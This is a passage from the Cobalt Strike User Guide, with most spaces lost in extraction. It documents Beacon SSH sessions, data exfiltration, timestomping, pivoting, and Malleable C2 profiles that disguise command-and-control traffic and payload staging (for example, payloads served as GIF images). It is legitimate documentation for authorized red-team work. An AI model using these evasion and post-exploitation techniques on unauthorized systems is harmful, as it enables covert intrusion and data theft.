fromandroutesitsoutputthroughaparentBeacon.
|
||
Right-clickatargetandgotoLogin -> sshtoauthenticatewithausernameandpassword.Go
|
||
toLogin -> ssh (key)toauthenticatewithakey.
|
||
FromaBeaconconsole,usessh [pid] [arch] [target] [user] [password]toinjectintothe
|
||
specifiedprocesstorunanSSHclientandattempttologintothespecifiedtarget.Usessh
|
||
[target] [user] [password] (without[pid]and[arch]arguments)tospawnatemporaryprocess
|
||
torunanSSHclientandattempttologintothespecifiedtarget.
|
||
Youmayalsousessh-key [pid] [arch] [target:port] [user] [/path/to/key.pem]toinjectintothe
|
||
specifiedprocesstorunanSSHclientandattempttologintothespecifiedtarget.Usessh-key
|
||
[target:port] [user] [/path/to/key.pem](without[pid]and[arch]arguments)tospawna
|
||
temporaryprocesstorunanSSHclientandattempttologintothespecifiedtarget.
|
||
NOTE:
|
||
ThekeyfileneedstobeinthePEMformat.IfthefileisnotinthePEMformatthenmakea
|
||
copyofthefileandconvertthecopywiththefollowingcommand:/usr/bin/ssh-keygen -f
|
||
[/path/to/copy] -e -m pem -p.
|
||
ThesecommandsrunCobaltStrike’sSSHclient.Theclientwillreportanyconnectionor
|
||
authenticationissuestotheparentBeacon.Iftheconnectionsucceeds,youwillseeanew
|
||
sessioninCobaltStrike’sdisplay.ThisisanSSHsession.Right-clickonthissessionandpress
|
||
Interact toopentheSSHconsole.
|
||
Typehelp toseealistofcommandstheSSHsessionsupports.Typehelpfollowedbya
|
||
commandnamefordetailsonthatcommand.
|
||
Running Commands
|
||
Theshell commandwillrunthecommandandargumentsyouprovide.Runningcommands
|
||
blocktheSSHsessionforupto20sbeforeCobaltStrikeputsthecommandinthebackground.
|
||
CobaltStrikewillreportoutputfromtheselongrunningcommandsasitbecomesavailable.
|
||
Usesudo [password] [command + arguments] toattempttorunacommandviasudo.This
|
||
aliasrequiresthetarget’ssudotoacceptthe–Sflag.
|
||
CobaltStrikeUserGuide www.fortra.com page:126
|
||
|
||
SSHSessions/UploadandDownloadFiles
|
||
Thecd commandwillchangethecurrentworkingdirectoryfortheSSHsession.Thepwd
|
||
commandreportsthecurrentworkingdirectory.
|
||
Upload and Download Files
|
||
Thefollowingcommandsareavailable:
|
||
NOTE:
|
||
Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
|
||
commandnametoseedetailedhelp.
|
||
download-Thiscommanddownloadstherequestedfile.Youdonotneedtoprovidequotes
|
||
aroundafilenamewithspacesinit.Beaconisbuiltforlowandslowexfiltrationofdata.
|
||
Duringeachcheck-in,Beaconwilldownloadafixedchunkofeachfileitstaskedtoget.
|
||
ThesizeofthischunkdependsonBeacon’scurrentdatachannel.TheHTTPandHTTPS
|
||
channelspulldatain512KBchunks.
|
||
downloads-UsetoseealistoffiledownloadsinprogressforthecurrentBeacon.
|
||
cancel-Issuethiscommand,followedbyafilename,tocanceladownloadthat’sinprogress.
|
||
Youmayusewildcardswithyourcancelcommandtocancelmultiplefiledownloadsat
|
||
once.
|
||
upload-Thiscommanduploadsafiletothehost.
|
||
timestomp-Whenyouuploadafile,youwillsometimeswanttoupdateitstimestampsto
|
||
makeitblendinwithotherfilesinthesamefolder.Thiscommandwilldothis.The
|
||
timestompcommandmatchestheModified,Accessed,andCreatedtimesofonefileto
|
||
anotherfile.
|
||
GotoView->DownloadsinCobaltStriketoseethefilesthatyourteamhasdownloadedsofar.
|
||
Onlycompleteddownloadsshowupinthistab.
|
||
Downloadedfilesarestoredontheteamserver.Tobringfilesbacktoyoursystem,highlight
|
||
themhere,andpressSync Files.CobaltStrikethendownloadstheselectedfilestoafolderof
|
||
yourchoosingonyoursystem.
|
||
Peer-to-peer C2
|
||
SSHsessionscancontrolTCPBeacons.Usetheconnect commandtoassumecontrolofa
|
||
TCPBeaconwaitingforaconnection.Useunlink todisconnectaTCPBeaconsession.
|
||
CobaltStrikeUserGuide www.fortra.com page:127
|
||
|
||
SSHSessions/SOCKSPivotingandReversePortForwards
|
||
Goto[session] ->Listeners ->Pivot Listener… tosetupapivotlistenertiedtothisSSH
|
||
session.ThiswillallowthiscompromisedUNIXtargettoreceivereverseTCPBeaconsessions.
|
||
ThisoptiondoesrequirethattheSSHdaemon’sGatewayPortsoptionissettoyesor
|
||
ClientSpecified.
|
||
SOCKS Pivoting and Reverse Port Forwards
|
||
Thefollowingcommandsareavailable:
|
||
NOTE:
|
||
Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
|
||
commandnametoseedetailedhelp.
|
||
socks-UsethiscommandtocreateaSOCKSserveronyourteamserverthatforwardstraffic
|
||
throughtheSSHsession.Therportfwd commandwillalsocreateareverseportforward
|
||
thatroutestrafficthroughtheSSHsessionandyourBeaconchain.
|
||
Thereisonecaveattorportfwd:therportfwdcommandaskstheSSHdaemontobindtoall
|
||
interfaces.It’squitelikelytheSSHdaemonwilloverridethisandforcetheporttobindto
|
||
localhost.YouneedtochangetheGatewayPortsoptionfortheSSHdaemontoyesor
|
||
clientspecified.
|
||
CobaltStrikeUserGuide www.fortra.com page:128
|
||
|
||
MalleableCommandandControl/Overview
|
||
Malleable Command and Control
|
||
Overview
|
||
Beacon'sHTTPindicatorsarecontrolledbyaMalleableCommandandControl(MalleableC2)
|
||
profile.AMalleableC2profileisasimpleprogramthatspecifieshowtotransformdataand
|
||
storeitinatransaction.Thesameprofilethattransformsandstoresdata,interpreted
|
||
backwards,alsoextractsandrecoversdatafromatransaction.
|
||
Touseacustomprofile,youmuststartaCobaltStriketeamserverandspecifyyourprofileat
|
||
thattime.
|
||
./teamserver [external IP] [password] [/path/to/my.profile]
|
||
YoumayonlyloadoneprofileperCobaltStrikeinstance.
|
||
Viewing the Loaded Profile
|
||
ToviewtheC2profilethatwasloadedwhentheTeamServerwasstartedselectHelp \
|
||
Malleable C2 Profileonthemenu.Thisdisplaystheprofileforthecurrentlyselected
|
||
TeamServerwhenmultipleTeamServersareconnected.Thedialogisread-only.
|
||
Toclosethedialogusethe'x'intheupperrightcornerofthedialog.
|
||
TIP:
|
||
ThissectioncoverstheMalleableC2featuresrelatedtoflexiblenetworkcommunications.
|
||
SeeMalleable PE, Process Injection, and Post Exploitation on page 151forinformation
|
||
onMalleableC2'sstage,process-inject,andpost-exblocks.
|
||
Checking for Errors
|
||
CobaltStrike’sLinuxpackageincludesac2lint program.Thisprogramwillcheckthesyntaxofa
|
||
communicationprofile,applyafewextrachecks,andevenunittestyourprofilewithrandom
|
||
data.It’shighlyrecommendedthatyoucheckyourprofileswiththistoolbeforeyouloadthem
|
||
intoCobaltStrike.
|
||
./c2lint [/path/to/my.profile]
|
||
c2lintreturnsandlogsthefollowingresultcodesforthespecifiedprofilefile:
|
||
CobaltStrikeUserGuide www.fortra.com page:129
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
l Aresultof0isreturnedifc2lintcompleteswithnoerrors
|
||
l Aresultof1isreturnedifc2lintcompleteswithonlywarnings
|
||
l Aresultof2isreturnedifc2lintcompleteswithonlyerrors
|
||
l Aresultof3isreturnedifc2lintcompleteswithbotherrorsandwarnings.
|
||
Thelastlinesofthec2lintoutputdisplayacountofdetectederrorsandwarnings.Nomessage
|
||
isdisplayedifnonearefound.Therecanbemoreerrormessagesdisplayedintheoutputthan
|
||
thecountrepresentsbecauseasingleerrormayproducemorethan1errormessage.Thisis
|
||
thesamepossibilityforwarningshoweverlesslikely.Forexample:
|
||
l [!]Detected1warning.
|
||
l [-]Detected3errors.
|
||
Profile Language
|
||
Thebestwaytocreateaprofileistomodifyanexistingone.Severalexampleprofilesare
|
||
availableonGithub:https://github.com/cobalt-strike/Malleable-C2-Profiles
|
||
Whenyouopenaprofile,hereiswhatyouwillsee:
|
||
# this is a comment
|
||
set global_option "value";
|
||
protocol-transaction {
|
||
set local_option "value";
|
||
client {
|
||
# customize client indicators
|
||
}
|
||
server {
|
||
# customize server indicators
|
||
}
|
||
}
|
||
Commentsbeginwitha#andgountiltheendoftheline.Thesetstatementisawaytoassigna
|
||
valuetoanoption.Profilesuse{ curlybraces}togroupstatementsandinformationtogether.
|
||
Statementsalwaysendwithasemi-colon.
|
||
Tohelpallofthismakesense,here’sapartialprofile:
|
||
http-get {
|
||
set uri "/foobar";
|
||
CobaltStrikeUserGuide www.fortra.com page:130
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
client {
|
||
metadata {
|
||
base64;
|
||
prepend "user=";
|
||
header "Cookie";
|
||
}
|
||
}
|
||
ThispartialprofiledefinesindicatorsforanHTTPGETtransaction.Thefirststatement,seturi,
|
||
assignstheURIthattheclientandserverwillreferenceduringthistransaction.Thisset
|
||
statementoccursoutsideoftheclientandservercodeblocksbecauseitappliestobothof
|
||
them.
|
||
TheclientblockdefinesindicatorsfortheclientthatperformsanHTTPGET.Theclient,inthis
|
||
case,isCobaltStrike’sBeaconpayload.
|
||
WhenCobaltStrike’sBeacon“phoneshome”itsendsmetadataaboutitselftoCobaltStrike.In
|
||
thisprofile,wehavetodefinehowthismetadataisencodedandsentwithourHTTPGET
|
||
request.
|
||
Themetadatakeywordfollowedbyagroupofstatementsspecifieshowtotransformand
|
||
embedmetadataintoourHTTPGETrequest.Thegroupofstatements,followingthemetadata
|
||
keyword,iscalledadatatransform.
|
||
Step Action Data
|
||
0. Start metadata
|
||
1. base64 Base64Encode bWV0YWRhdGE=
|
||
2. prepend"user=" PrependString user=bWV0YWRhdGE=
|
||
3. header"Cookie" StoreinTransaction
|
||
Thefirststatementinourdatatransformstatesthatwewillbase64encodeourmetadata[1].
|
||
Thesecondstatement,prepend,takesourencodedmetadataandprependsthestringuser=to
|
||
it[2].Nowourtransformedmetadatais“user=“ .base64(metadata).Thethirdstatementstates
|
||
wewillstoreourtransformedmetadataintoaclientHTTPheadercalledCookie[3].That’sit.
|
||
BothBeaconanditsserverconsumeprofiles.Here,we’vereadtheprofilefromtheperspective
|
||
oftheBeaconclient.TheBeaconserverwilltakethissameinformationandinterpretit
|
||
backwards.Let’ssayourCobaltStrikewebserverreceivesaGETrequesttotheURI/foobar.
|
||
Now,itwantstoextractmetadatafromthetransaction.
|
||
Step Action Data
|
||
0. Start
|
||
CobaltStrikeUserGuide www.fortra.com page:131
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
Step Action Data
|
||
1. header"Cookie" RecoverfromTransaction user=bWV0YWRhdGE=
|
||
2. prepend"user=" Removefirst5characters bWV0YWRhdGE=
|
||
3. base64 Base64Decode metadata
|
||
Theheaderstatementwilltellourserverwheretorecoverourtransformedmetadatafrom[1].
|
||
TheHTTPservertakescaretoparseheadersfromtheHTTPclientforus.Next,weneedtodeal
|
||
withtheprependstatement.Torecovertransformeddata,weinterpretprependasremovethe
|
||
firstXcharacters[2],whereXisthelengthoftheoriginalstringweprepended.Now,allthat’sleft
|
||
istointerpretthelaststatement,base64.Weusedabase64encodefunctiontotransformthe
|
||
metadatabefore.Now,weuseabase64decodetorecoverthemetadata[3].
|
||
Wewillhavetheoriginalmetadataoncetheprofileinterpreterfinishesexecutingeachofthese
|
||
inversestatements.
|
||
Data Transform Language
|
||
Adatatransformisasequenceofstatementsthattransformandtransmitdata.Thedata
|
||
transformstatementsare:
|
||
Statement Action Inverse
|
||
append"string" Append"string" RemovelastLEN(“string”)characters
|
||
base64 Base64Encode Base64Decode
|
||
base64url URL-safeBase64Encode URL-safeBase64Decode
|
||
mask XOR maskw/randomkey XOR maskw/samerandomkey
|
||
netbios NetBIOSEncode‘a’ NetBIOSDecode‘a’
|
||
netbiosu NetBIOSEncode‘A’ NetBIOSDecode‘A’
|
||
prepend"string" Prepend"string" RemovefirstLEN(“string”)characters
|
||
Adatatransformisacombinationofanynumberofthesestatements,inanyorder.For
|
||
example,youmaychoosetonetbiosencodethedatatotransmit,prependsomeinformation,
|
||
andthenbase64encodethewholepackage.
|
||
Adatatransformalwaysendswithaterminationstatement.Youmayonlyuseonetermination
|
||
statementinatransform.ThisstatementtellsBeaconanditsserverwhereinthetransactionto
|
||
storethetransformeddata.
|
||
Therearefourterminationstatements.
|
||
CobaltStrikeUserGuide www.fortra.com page:132
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
Statement What
|
||
header“header” StoredatainanHTTPheader
|
||
parameter“key” StoredatainaURIparameter
|
||
print Senddataastransactionbody
|
||
uri-append AppendtoURI
|
||
TheheaderterminationstatementstorestransformeddatainanHTTPheader.Theparameter
|
||
terminationstatementstorestransformeddatainanHTTPparameter.Thisparameteris
|
||
alwayssentaspartofURI.Theprintstatementsendstransformeddatainthebodyofthe
|
||
transaction.
|
||
Theprintstatementistheexpectedterminationstatementforthehttp-get.server.output,http-
|
||
post.server.output,andhttp-stager.server.outputblocks.Youmayusetheheader,parameter,
|
||
printanduri-appendterminationstatementsfortheotherblocks.
|
||
Ifyouuseaheader,parameter,oruri-appendterminationstatementonhttp-post.client.output,
|
||
Beaconwillchunkitsresponsestoareasonablelengthtofitintothispartofthetransaction.
|
||
Theseblocksandthedatatheysendaredescribedinalatersection.
|
||
Strings
|
||
Beacon’sProfileLanguageallowsyoutouse“strings”inseveralplaces.Ingeneral,stringsare
|
||
interpretedas-is.However,thereareafewspecialvaluesthatyoumayuseinastring:
|
||
Value Special Value
|
||
“\n” Newlinecharacter
|
||
“\r” CarriageReturn
|
||
“\t” Tabcharacter
|
||
“\u####” Aunicodecharacter
|
||
“\x##” Abyte(e.g.,\x41=‘A’)
|
||
“\\” \
|
||
Headers and Parameters
|
||
Datatransformsareanimportantpartoftheindicatorcustomizationprocess.Theyallowyou
|
||
todressupdatathatBeaconmustsendorreceivewitheachtransaction.Youmayadd
|
||
extraneousindicatorstoeachtransactiontoo.
|
||
CobaltStrikeUserGuide www.fortra.com page:133
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
InanHTTPGETorPOSTrequest,theseextraneousindicatorscomeintheformofheadersor
|
||
parameters.Usetheparameterstatementwithintheclientblocktoaddanarbitraryparameter
|
||
toanHTTPGETorPOSTtransaction.
|
||
ThiscodewillforceBeacontoadd?bar=blahtothe/foobarURIwhenitmakesarequest.
|
||
http-get {
|
||
client {
|
||
parameter "bar" "blah";
|
||
UsetheheaderstatementwithintheclientorserverblockstoaddanarbitraryHTTPheaderto
|
||
theclient’srequestorserver’sresponse.Thisheaderstatementaddsanindicatortoput
|
||
networksecuritymonitoringteamsatease.
|
||
http-get {
|
||
server {
|
||
header "X-Not-Malware" "I promise!";
|
||
TheProfileInterpreterwillInterpretyourheaderandparameterstatementsInorder.Thatsaid,
|
||
theWinINetorWinHTTP(client)andCobaltStrikewebserverhavethefinalsayaboutwherein
|
||
thetransactiontheseindicatorswillappear.
|
||
SeeHTTP Host Profiles on page 140forinstructionstoincludecustomizedheadersand
|
||
parametersforspecifichostnames.
|
||
Options
|
||
YoumayconfigureBeacon’sdefaultsthroughtheprofilefile.Therearetwotypesofoptions:
|
||
globalandlocaloptions.TheglobaloptionschangeaglobalBeaconsetting.Localoptionsare
|
||
transactionspecific.Youmustsetlocaloptionsintherightcontext.Usethesetstatementtoset
|
||
anoption.
|
||
set "sleeptime" "1000";
|
||
Hereareafewoptions:
|
||
Option Context Default Value Changes
|
||
data_jitter 0 Appendrandom-lengthstring(upto
|
||
data_jittervalue)tohttp-getandhttp-
|
||
postserveroutput.
|
||
CobaltStrikeUserGuide www.fortra.com page:134
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
Option Context Default Value Changes
|
||
headers_remove Comma-separatedlistofHTTPclient
|
||
headerstoremovefromBeaconC2
|
||
host_stage true HostpayloadforstagingoverHTTP,
|
||
HTTPS,orDNS.Requiredbystagers.
|
||
jitter 0 Defaultjitterfactor(0-99%)
|
||
Thispropertycannotbeusedwhenthe
|
||
sleepoptionisincludedintheprofile.
|
||
pipename msagent_## DefaultnameofpipetouseforSMB
|
||
Beacon’speer-to-peercommunication.
|
||
Each#isreplacedwitharandomhex
|
||
value.
|
||
pipename_stager status_## NameofpipetouseforSMBBeacon’s
|
||
namedpipestager.Each#isreplaced
|
||
witharandomhexvalue.
|
||
sample_name MyProfile Thenameofthisprofile(usedinthe
|
||
IndicatorsofCompromisereport)
|
||
sleep Defaultsleeptimedefinedaseither:
|
||
secondsjitter(e.g.'2025')
|
||
or
|
||
[n]d[n]h[n]m[n]s[n]j(e.g.'1d13h34m
|
||
45s25j')
|
||
Thispropertycannotbeusedwhenthe
|
||
sleeptimeandjitteroptionsare
|
||
includedintheprofile.
|
||
sleeptime 60000 Defaultsleeptime(inmilliseconds).
|
||
Thispropertycannotbeusedwhenthe
|
||
sleepoptionisincludedintheprofile.
|
||
smb_frame_header PrependheadertoSMBBeacon
|
||
messages
|
||
ssh_banner CobaltStrike SSHclientbanner
|
||
4.2
|
||
ssh_pipename postex_ssh_ NameofpipeforSSHsessions.Each#
|
||
#### isreplacedwitharandomhexvalue.
|
||
CobaltStrikeUserGuide www.fortra.com page:135
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
Option Context Default Value Changes
|
||
steal_token_ Blank/0 Setsthedefaultusedbysteal_token
|
||
access_mask (TOKEN_ALL_ beaconcommandandbsteal_token
|
||
ACCESS) beaconaggressorscriptcommandfor
|
||
theOpenProcessTokenfunctions
|
||
"DesiredAccess".
|
||
Suggestion:use"11"for"TOKEN_
|
||
DUPLICATE|TOKEN_ASSIGN_
|
||
PRIMARY|TOKEN_QUERY"
|
||
tasks_max_size 1048576 Themaximumsize(inbytes)oftask(s)
|
||
andproxydatathatcanbetransferred
|
||
throughacommunicationchannelata
|
||
checkin
|
||
tasks_proxy_max_ 921600 Themaximumsize(inbytes)ofproxy
|
||
size datatotransferviathecommunication
|
||
channelatacheckin.
|
||
tasks_dns_proxy_ 71680 Themaximumsize(inbytes)ofproxy
|
||
max_size datatotransferviatheDNS
|
||
communicationchannelatacheckin.
|
||
tcp_frame_header PrependheadertoTCPBeacon
|
||
messages
|
||
tcp_port 4444 DefaultTCPBeaconlistenport
|
||
uri http-get, [required TransactionURI
|
||
http-post option]
|
||
uri_x86 http-stager x86payloadstageURI
|
||
uri_x64 http-stager x64payloadstageURI
|
||
useragent Internet DefaultUser-AgentforHTTPcomms.
|
||
Explorer
|
||
(Random)
|
||
verb http-get, GET,POST HTTPVerbtousefortransaction
|
||
http-post
|
||
Withtheurioption,youmayspecifymultipleURIsasaspaceseparatedstring.CobaltStrike’s
|
||
webserverwillbindalloftheseURIsanditwillassignoneoftheseURIstoeachBeaconhost
|
||
whentheBeaconstageisbuilt.
|
||
Eventhoughtheuseragentoptionexists;youmayusetheheaderstatementtooverridethis
|
||
option.
|
||
AdditionalConsiderationsfor the'task_' Settings
|
||
CobaltStrikeUserGuide www.fortra.com page:136
|
||
|
||
MalleableCommandandControl/ProfileLanguage
|
||
Thetasks_max_size,tasks_proxy_max_size,andtasks_dns_proxy_max_sizeworktogetherto
|
||
createadatabuffertobetransferredtobeaconwhenacheckinoccurs.Whenthebeacon
|
||
checksinitrequestsalistoftasksandproxydatathatisreadytobetransferredtothisbeacon
|
||
anditschildren.Thedatabufferstartstofillwithtask(s)followedbyproxydatafortheparent
|
||
beacon.Thenitcontinuesthispatternforeachchildbeaconuntilnomoretasksorproxydatais
|
||
availableorthetasks_max_sizesettingwillbeexceededbythenexttaskorproxydata.
|
||
Thetasks_max_sizecontrolsthemaximumsizeinbytesadatabufferfilledwithtasksand
|
||
proxydatacanbetotransferittobeaconthroughDNS,HTTP,HTTPS,andPeer-to-Peer
|
||
communicationchannels.Mostofthetimethedefaultsarefine,howeverthereareoccasions
|
||
whenacustomtaskwillexceedthemaximumsizeandcannotbesent.Forexample,youuse
|
||
theexecute-assemblywithanexecutablelargerthan1MBinsizeandthefollowingmessageis
|
||
displayedintheteamserverandbeaconconsoles.
|
||
[TeamServerConsole]
|
||
Droppingtaskfor40147050!Tasksizeof1389584bytesisoverthemaxtasksizelimitof
|
||
1048576bytes.
|
||
[BeaconConsole]
|
||
Tasksizeof1389584bytesisoverthemaxtasksizelimitof1048576bytes.
|
||
Increasingthetasks_max_sizesettingwillallowthiscustomtasktobesent.However,itwill
|
||
requirerestartingtheteamserverandgeneratingnewbeaconsasthetasks_max_sizeis
|
||
patchedintotheconfigurationsettingswhenabeaconisgeneratedandcannotbemodified.
|
||
Thissettingalsoaffectshowmuchheapmemorybeaconallocatestoprocesstasks.
|
||
Best Practices:
|
||
l Determinethelargesttasksizethatwillbesenttoabeacon.Thiscanbedonethrough
|
||
testingandlookingforthemessageaboveorinvestigatingyourcustom objects
|
||
(executables,dlls,etc)thatareusedinyourengagements.Oncethisisdeterminedadd
|
||
someextraspacetothevalue.Usingtheinformationfrom theaboveexampleuse
|
||
1572864(1.5MB)asthetasks_max_size.Thereasontohaveextraspaceisbecausea
|
||
smallertaskmayfollowthelargertasktoreadtheresponse.
|
||
l Whenthetasks_max_sizevalueisdeterminedupdatethetask_max_sizesettinginyour
|
||
profileandstarttheteam serverandgenerateyourbeaconartifactstodeployonyour
|
||
targetsystems.
|
||
l Ifyourinfrastructurerequiresbeaconsgeneratedfrom otherteam serverstoconnect
|
||
witheachotherthroughPeer-to-Peercommunicationchannels,thenthissettingshould
|
||
beupdatedonallteam servers.Otherwise,abeaconwillignorearequestwhenit
|
||
exceedsitsconfiguredsize.
|
||
l IfyouareusinganExternaC2listeneranupdatewouldberequiredtosupporttasks_
|
||
max_sizelargerthanthedefaultsizeof1MB.
|
||
CobaltStrikeUserGuide www.fortra.com page:137
|
||
|
||
MalleableCommandandControl/HTTPStaging
|
||
Whenexecutingalargetaskavoidqueueingitwithothertasks,especiallyifthisisbeing
|
||
executedonabeaconusingpeer-to-peercommunicationchannels(SMBandTCP)asitcould
|
||
bedelayedforseveralcheckinsdependingonthenumberofalreadyqueuedtasksandproxy
|
||
datatosend.ThereasoniswhenataskisaddedithasasizeofXbyteswhichreducesthetotal
|
||
availablespaceavailableforaddingadditionaltasks.Inaddition,proxyingdatathrougha
|
||
beaconwillalsoreducetheamountofavailablespaceforsendingalargetask.Whenataskis
|
||
delayedthefollowingmessageisdisplayedintheteamserverandbeaconconsoles.
|
||
[TeamServerConsole]
|
||
Chunkingtasksfor123!Unabletoaddtaskof787984bytesasitisovertheavailablesizeof
|
||
260486bytes.2task(s)onholduntilnextcheckin.
|
||
[BeaconConsole]
|
||
Unabletoaddtaskof787984bytesasitisovertheavailablesizeof260486bytes.2task(s)
|
||
onholduntilnextcheckin.
|
||
Thetasks_dns_proxy_max_size(DNSchannel)andtasks_proxy_max_size(Otherchannels)
|
||
controlsthesizeofproxydatainbytestobesenttobeacon.Bothsettingsneedtobelessthan
|
||
thetasks_max_sizesetting.Itisrecommendednottomodifythesesettingsasthedefaultsizes
|
||
arefine.Howthesesettingsworkiswhenitistimetoaddproxydatatothedatabufferfora
|
||
parentbeaconitusesthechannelsproxy_max_sizesettingminusthecurrenttasklength,which
|
||
canbeeitherapositiveornegativevalue.Ifitisapositivevalue,thentheproxydatawillbe
|
||
addeduptothatvalue.ifitisanegativevaluetheproxydataisskippedforthischeckin.Fora
|
||
childbeacontheproxy_max_sizeistemporarilyreducedbasedontheavailabledatabuffer
|
||
spaceleftfromprocessingtheparentandpriorchildren.
|
||
HTTP Staging
|
||
Beaconisastagedpayload.Thismeansthepayloadisdownloadedbyastagerandinjected
|
||
intomemory.Yourhttp-getandhttp-postindicatorswillnottakeeffectuntilBeaconisin
|
||
memoryonyourtarget.MalleableC2’shttp-stagerblockcustomizestheHTTPstagingprocess.
|
||
http-stager {
|
||
set uri_x86 "/get32.gif";
|
||
set uri_x64 "/get64.gif";
|
||
Theuri_x86optionsetstheURItodownloadthex86payloadstage.Theuri_x64optionsetsthe
|
||
URItodownloadthex64payloadstage.
|
||
client {
|
||
parameter "id" "1234";
|
||
header "Cookie" "SomeValue";
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:138
|
||
|
||
MalleableCommandandControl/ABeaconHTTPTransactionWalk-through
|
||
Theclientkeywordunderthecontextofhttp-stagerdefinestheclientsideoftheHTTP
|
||
transaction.UsetheparameterkeywordtoaddaparametertotheURI.Usetheheaderkeyword
|
||
toaddaheadertothestager’sHTTPGETrequest.
|
||
server {
|
||
header "Content-Type" "image/gif";
|
||
output {
|
||
prepend "GIF89a";
|
||
print;
|
||
}
|
||
}
|
||
Theserverkeywordunderthecontextofhttp-stagerdefinestheserversideoftheHTTP
|
||
transaction.Theheaderkeywordaddsaserverheadertotheserver’sresponse.Theoutput
|
||
keywordundertheservercontextofhttp-stagerisadatatransformtochangethepayload
|
||
stage.Thistransformmayonlyprependandappendstringstothestage.Usetheprint
|
||
terminationstatementtoclosethisoutputblock.
|
||
ABeacon HTTP Transaction Walk-through
|
||
Toputallofthistogether,ithelpstoknowwhataBeacontransactionlookslikeandwhichdata
|
||
issentwitheachrequest.
|
||
AtransactionstartswhenaBeaconmakesanHTTPGETrequesttoCobaltStrike’swebserver.
|
||
Atthistime,Beaconmustsendmetadatathatcontainsinformationaboutthecompromised
|
||
system.
|
||
TIP:
|
||
Sessionmetadataisanencryptedblobofdata.Withoutencoding,itisnotsuitablefor
|
||
transportinaheaderorURIparameter.Alwaysapplyabase64,base64url,ornetbios
|
||
statementtoencodeyourmetadata.
|
||
CobaltStrike’swebserverrespondstothisHTTPGETwithtasksthattheBeaconmustexecute.
|
||
Thesetasksare,initially,sentasoneencryptedbinaryblob.Youmaytransformthisinformation
|
||
withtheoutputkeywordundertheservercontextofhttp-get.
|
||
AsBeaconexecutesitstasks,itaccumulatesoutput.Afteralltasksarecomplete,Beacon
|
||
checksifthereisoutputtosend.Ifthereisnooutput,Beacongoestosleep.Ifthereisoutput,
|
||
BeaconinitiatesanHTTPPOSTtransaction.
|
||
TheHTTPPOSTrequestmustcontainasessionidinaURIparameterorheader.CobaltStrike
|
||
usesthisinformationtoassociatetheoutputwiththerightsession.Thepostedcontentis,
|
||
CobaltStrikeUserGuide www.fortra.com page:139
|
||
|
||
MalleableCommandandControl/HTTPHostProfiles
|
||
initially,anencryptedbinaryblob.Youmaytransformthisinformationwiththeoutputkeyword
|
||
undertheclientcontextofhttp-post.
|
||
CobaltStrike’swebservermayrespondtoanHTTPPOSTwithanythingitlikes.Beacondoes
|
||
notconsumeorusethisinformation.YoumayspecifytheoutputofHTTPPOSTwiththeoutput
|
||
blockundertheservercontextofhttp-post.
|
||
NOTE:
|
||
Whilehttp-getusesGETbydefaultandhttp-postusesPOSTbydefault,you’renotstuck
|
||
withtheseoptions.Usetheverboptiontochangethesedefaults.There’salotofflexibility
|
||
here.
|
||
Thistablesummarizesthesekeywordsandthedatatheysend:
|
||
Request Component Block Data
|
||
http-get client metadata Sessionmetadata
|
||
http-get server output Beacon’stasks
|
||
http-post client id SessionID
|
||
http-post client output Beacon’sresponses
|
||
http-post server output Empty
|
||
http-stager server output Encodedpayloadstage
|
||
HTTP Host Profiles
|
||
HostProfilesisusedtodefineHTTPcharacteristics(uri,headers,andparameters)thatwillbe
|
||
usedfortheHTTP/HTTPScommunicationtrafficforaspecifichostname.HostProfilesis
|
||
optional.HostProfilescanbedefinedformultiplehostnames.
|
||
About Dynamic Data
|
||
Somefieldsinhttp-host-profilesgroupsupportadynamicvaluesyntax.Beaconswillrandomly
|
||
selectoneoftheoptionalvaluesinthespecifieddynamicsyntax.Dynamicsyntaxiswrappedby
|
||
squarebracketswithvaluesseparatedby"|".
|
||
Feature Example Resolves to
|
||
[example.abc|sample.def|demo.ghi] example.abc
|
||
Dynamicsyntaxcanbe
|
||
sample.def
|
||
anentirevalue.
|
||
demo.ghi
|
||
CobaltStrikeUserGuide www.fortra.com page:140
|
||
|
||
MalleableCommandandControl/HTTPHostProfiles
|
||
Feature Example Resolves to
|
||
prefix/[a|b]/suffix prefix/a/suffix
|
||
Dynamicsyntaxcanbe
|
||
prefix/b/suffix
|
||
embeddedinstatictext.
|
||
abc/folder[1||3|]/xyz abc/folder1/xyz
|
||
Dynamicsyntaxcanhave
|
||
abc/folder/xyz
|
||
oneormoreblank
|
||
abc/folder3/xyz
|
||
optionsasaselected
|
||
abc/folder/xyz
|
||
value.
|
||
[abc|xyz]/[123|456]/
|
||
Dynamicsyntaxcanhave
|
||
[index.html|hello.js|home.jsp]
|
||
multipledynamicitems.
|
||
http-host-profiles {
|
||
profile {
|
||
set host-name "one.ytrewq.com";
|
||
http-get {
|
||
set uri "/[a|b|c|d]/ytrewq/get.js";
|
||
header "ytrewq-header-[a|b|c]" "static-value";
|
||
parameter "ytrewq-parameter" "value-[x|y|z]";
|
||
parameter "ytrewq-[a|b|c]" "value-[x|y|z]";
|
||
## Example of param name that will be dropped when it resolves as blank
|
||
parameter "[p1|||p4]" "[a|b|c]";
|
||
}
|
||
http-post {
|
||
set uri "/[a|b|c|d]/ytrewq/[post1|post2|post3|post4].js";
|
||
header "ytrewq-header-[a|b|c]" "static-value";
|
||
parameter "ytrewq-parameter" "value-[x|y|z]";
|
||
parameter "ytrewq-[a|b|c]" "value-[x|y|z]";
|
||
parameter "[p1|||p4]" "[a|b|c]";
|
||
}
|
||
}
|
||
profile {
|
||
set host-name "two.ytrewq.com";
|
||
http-get {
|
||
set uri "/ytrewq/get/[2|two|dos]/[a|b|c].js";
|
||
}
|
||
http-post {
|
||
set uri "/ytrewq/post/[2|two|dos]/[a|b|c].js";
|
||
}
|
||
}
|
||
}
|
||
Thesettingsare:
|
||
CobaltStrikeUserGuide www.fortra.com page:141
|
||
|
||
MalleableCommandandControl/HTTPHostProfiles
|
||
Field Description
|
||
host-name Thehost-namefieldisafixedstringthatlinkstheHostProfiletomatching
|
||
HTTP HostsfieldontheHTTP/HTTPSlistenerdefinitions.Thefieldis
|
||
requiredandcasesensitive.ItdoesNOTsupportembeddeddynamic
|
||
[a|b|c]
|
||
